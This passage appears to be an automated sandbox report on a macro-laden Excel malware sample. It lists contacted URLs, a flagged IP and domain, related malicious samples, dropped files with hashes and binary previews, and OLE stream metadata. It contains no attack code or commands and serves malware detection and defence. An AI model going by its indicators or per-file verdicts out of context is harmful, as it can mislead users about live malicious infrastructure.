                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      78.46.235.88
                                                                                                                                                      unknownGermany
                                                                                                                                                      24940HETZNER-ASDEfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:324295
                                                                                                                                                      Start date:29.11.2020
                                                                                                                                                      Start time:04:04:17
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 4m 36s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:document-1411290183.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:16
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal72.expl.evad.winXLS@3/7@1/1
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.76.35, 52.109.12.24, 51.11.168.160, 104.43.193.48, 52.155.217.156, 20.54.26.129, 8.248.117.254, 67.27.235.126, 67.26.73.254, 8.248.147.254, 8.248.131.254, 13.64.90.137, 92.122.213.194, 92.122.213.247, 51.104.144.132
                                                                                                                                                      • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      78.46.235.88document-1393356833.xlsGet hashmaliciousBrowse
                                                                                                                                                        document-1411290183.xlsGet hashmaliciousBrowse
                                                                                                                                                          document-1393356833.xlsGet hashmaliciousBrowse
                                                                                                                                                            document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                              document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                  document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                    document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                      document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                        document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                          document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                            document-1465459998.xlsGet hashmaliciousBrowse
                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            document-1460706074.xlsGet hashmaliciousBrowse

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              dtmh.grdocument-1393356833.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1411290183.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1393356833.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1465459998.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88

                                                                                                                                                                                              ASN

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              HETZNER-ASDEdocument-1393356833.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1411290183.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1393356833.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1465459998.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              https://ofd.beeline.ru/check-order/oxjsoinmqGet hashmaliciousBrowse
                                                                                                                                                                                              • 88.99.149.88
                                                                                                                                                                                              document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              No context

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              No context

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\98B0119A-1406-4C2B-A22D-9268E679C45C
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):129952
                                                                                                                                                                                              Entropy (8bit):5.378329255121336
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:BcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:rmQ9DQW+zBX8u
                                                                                                                                                                                              MD5:8329B80FC53E514D377B84751BD413BA
                                                                                                                                                                                              SHA1:026026402B822781EAFFF3B3D47362FF5F6DA835
                                                                                                                                                                                              SHA-256:3C51C057ACBA595A955E0177585EFC41893D36FBFA855FADAB9DB200E15DFD33
                                                                                                                                                                                              SHA-512:C2D7813C24F3B15BBD128E1379EE4976DE595419FDCEE699744B3712B51A3C0AB8F59BBA866CB55A51F0AA1DB23D216F9DECC49692AB8E1F325BDD3DB024BC74
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-29T03:05:14">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1DC40000
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):314884
                                                                                                                                                                                              Entropy (8bit):7.985555299271796
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:mB+mBrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MY:nmBFPM8R3AsB+bjej/9cj
                                                                                                                                                                                              MD5:79FB0593622BB971A34B5CE5ED0C2C92
                                                                                                                                                                                              SHA1:6DD28D3519B9F6189FF36E69B4862A84E6EEAD39
                                                                                                                                                                                              SHA-256:FD5D64E51643E0B24C87BF76380332A0CC8BFDCBF5840F83AD528227B6821D3F
                                                                                                                                                                                              SHA-512:52FAFEA03B62EF2FD11E9BA0F45549948B769AB2423C11AD26D67483DD3B4892DA27B050C70955184EED316A6ECA1E8422C6342DF02906DD8AEB074EB13C2547
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: .V.n.0....?......(..r.izl.$...\K....I..RV.4p,.6.^..vfv....jcM....w5..f..'........WV`.N....l....?.....h.5kS..8G..X...VV>Z..66<...........%p.L..-..a%.L*n6.x.d..+.w.e......".P...+..VZ.....t.!.P..$k..51.;H..C..r....6k...GD08Mf.CE.]*...7....>.q...Q+(nEL?.%....'..K...a.l...6.L.9VY!..qbi..v...0u.......n....t.#::.S.........;.;.........C......=....@....r.f..;...;..m.ik..\....s+"..Dm.9....#:T.OY../N............p.....> .....<O..]....4.3e_...i...1.@....O..........PK..........!.C.T.....e.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Sun Nov 29 02:05:17 2020, atime=Sun Nov 29 02:05:17 2020, length=8192, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):904
                                                                                                                                                                                              Entropy (8bit):4.66220223869404
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:8f3CXUstduCH2KOFFR43Asm9nz8+WrjAZ/DYbDxSeuSeL44t2Y+xIBjKZm:8vYiFJ9n6AZbcDX7aB6m
                                                                                                                                                                                              MD5:12925E29557B562227DC4C54EE7F060B
                                                                                                                                                                                              SHA1:B33569EB87E84536EACC1F94377726310ADB4E4C
                                                                                                                                                                                              SHA-256:E7D8B24284BC0BEF5AFAAA59CA0A188C892DECBD8D6348172E396B57C940F0E0
                                                                                                                                                                                              SHA-512:D6222C6C18899270DAE5A38463EA550D8F32EB7F5A94A5884B6824CA79FA997F61CA91152220ECBADFA5CEDFF6D0C1D71BE0B1DE276A9C605C16C4A17DB8FC58
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: L..................F.............-..0H@w.....!9w..... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Q......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..}Q......#J.....................e..j.o.n.e.s.....~.1.....}Q....Desktop.h.......N..}Q.......Y..............>.......A.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......424505...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1411290183.LNK
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:52 2020, mtime=Sun Nov 29 02:05:17 2020, atime=Sun Nov 29 02:05:17 2020, length=339968, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4400
                                                                                                                                                                                              Entropy (8bit):4.696521558764979
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:8BiFxpRjRqKB6pBiFxpRjRqKB6pdiFxpRjRqKB6pdiFxpRjRqKB6:8Bi39KBi39Kdi39Kdi39
                                                                                                                                                                                              MD5:3FE27E767F0D67B1CE3B2795270D01BA
                                                                                                                                                                                              SHA1:98A69875A394ADB8C4ADAC5166D9F470590C6ABC
                                                                                                                                                                                              SHA-256:219BDC7216BAD71CD9BB021AC356D9B6B0EADF3675704957CA8ED3C41EE8CC9C
                                                                                                                                                                                              SHA-512:397C7ADC03D9368FB16B0BBE72BC67E6D3CC941A4E8AFBDB62283099D226D971D93B764C016A844767A1DFBEE2AC5C557A4342EDFBC06ABB1326743B97F9AE2B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: L..................F.... .....&S.....5Lw.....5Lw.....0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Q......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..}Q......#J.....................e..j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N..}Q.......Y..............>......'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2..0..}Q.. .DOCUME~1.XLS..`......>Q{<}Q.......V.....................:..d.o.c.u.m.e.n.t.-.1.4.1.1.2.9.0.1.8.3...x.l.s.......]...............-.......\...........>.S......C:\Users\user\Desktop\document-1411290183.xls........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.1.1.2.9.0.1.8.3...x.l.s.........:..,.LB.)...As...`.......X.......424505...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):232
                                                                                                                                                                                              Entropy (8bit):4.707013899257223
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:dj6Y9LCCELCKY9LCCELCKY9LCCELCKY9LCC:dmttt0
                                                                                                                                                                                              MD5:A0CB30A30AEEFC7C978D63BE605EEA5B
                                                                                                                                                                                              SHA1:97E7E415E40F92C6422A2C50688C07100F8F8AC3
                                                                                                                                                                                              SHA-256:8B27F20DC92EFF0CAF7687295D067F79B69F1779FD3FAAF34FA6D8E6F09DDC31
                                                                                                                                                                                              SHA-512:35BA55B73AE11177988B888A3B5F9360B1B36B49FCB4F8CA75DB530B7D90C057F074896F85CC704D422758E7E7DF1DE774DA3B3166105FFF4AE854B4EC9D5889
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: Desktop.LNK=0..[xls]..document-1411290183.LNK=0..document-1411290183.LNK=0..[xls]..document-1411290183.LNK=0..document-1411290183.LNK=0..[xls]..document-1411290183.LNK=0..document-1411290183.LNK=0..[xls]..document-1411290183.LNK=0..
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):22
                                                                                                                                                                                              Entropy (8bit):2.9808259362290785
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                              MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                              SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                              SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                              SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                              Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                              C:\Users\user\Desktop\0EC40000
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):401455
                                                                                                                                                                                              Entropy (8bit):7.180617145032013
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:icKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdk:Jizo8RnsIROnr6n75YJP
                                                                                                                                                                                              MD5:967D3011815EE0A434FB2AF6CD921DA7
                                                                                                                                                                                              SHA1:403122FDA22A27E825834380C5E0F786219F2DE7
                                                                                                                                                                                              SHA-256:1BF7508F5524FA13D98CA437DF90723A264D2432CF46D2BCC6F7B7F342D57FD5
                                                                                                                                                                                              SHA-512:4FADE488C6B7F0ADE15C4C597A26429506CD6396E2399A8CEAA3DA2F326EA07A01089EE09931607F860E65C06BA345384BEF51B9DAC8BB373A88F40B39912685
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: ........T8..........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.......>..........C.a.l.i.b.r.i.1.......?..........C.a.l.i.b.r.i.1.......4..........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...h...8..........C.a.m.b.r.i.a.1.......<..........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:47:56 2020, Security: 0
                                                                                                                                                                                              Entropy (8bit):7.519789176158722
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                              File name:document-1411290183.xls
                                                                                                                                                                                              File size:339968
                                                                                                                                                                                              MD5:32a11b7a08798a31c2ecce5ff34de4da
                                                                                                                                                                                              SHA1:316cbd65065f682a134182f72517251b28daee3b
                                                                                                                                                                                              SHA256:25cfb8623367e8f73139b0163de1750283af61ec4d78e0c0c9d6bb0a8bbc6651
                                                                                                                                                                                              SHA512:11d9597b2cbb48b03208a38d25787b5948089fe64481c7049d2f90b748797ac9532eea267fcc6eca65db92cf4ceb46f9dd8eb192296cea0addde8dcc54fc14b8
                                                                                                                                                                                              SSDEEP:6144:WcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpT3:7izo8RnsIROnr6n75YD
                                                                                                                                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                              Static OLE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Document Type:OLE
                                                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                                                              OLE File "document-1411290183.xls"

                                                                                                                                                                                              Indicators

                                                                                                                                                                                              Has Summary Info:True
                                                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                                                              Encrypted Document:False
                                                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                                                              Flash Objects Count:
                                                                                                                                                                                              Contains VBA Macros:True

                                                                                                                                                                                              Summary

                                                                                                                                                                                              Code Page:1251
                                                                                                                                                                                              Author:
                                                                                                                                                                                              Last Saved By:
                                                                                                                                                                                              Create Time:2006-09-16 00:00:00
                                                                                                                                                                                              Last Saved Time:2020-11-26 09:47:56
                                                                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                                                                              Security:0

                                                                                                                                                                                              Document Summary

                                                                                                                                                                                              Document Code Page:1251
                                                                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                                                                              Contains Dirty Links:False
                                                                                                                                                                                              Shared Document:False
                                                                                                                                                                                              Changed Hyperlinks:False
                                                                                                                                                                                              Application Version:917504

                                                                                                                                                                                              Streams

                                                                                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.367004077607
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.246848689361
                                                                                                                                                                                              Base64 Encoded:False
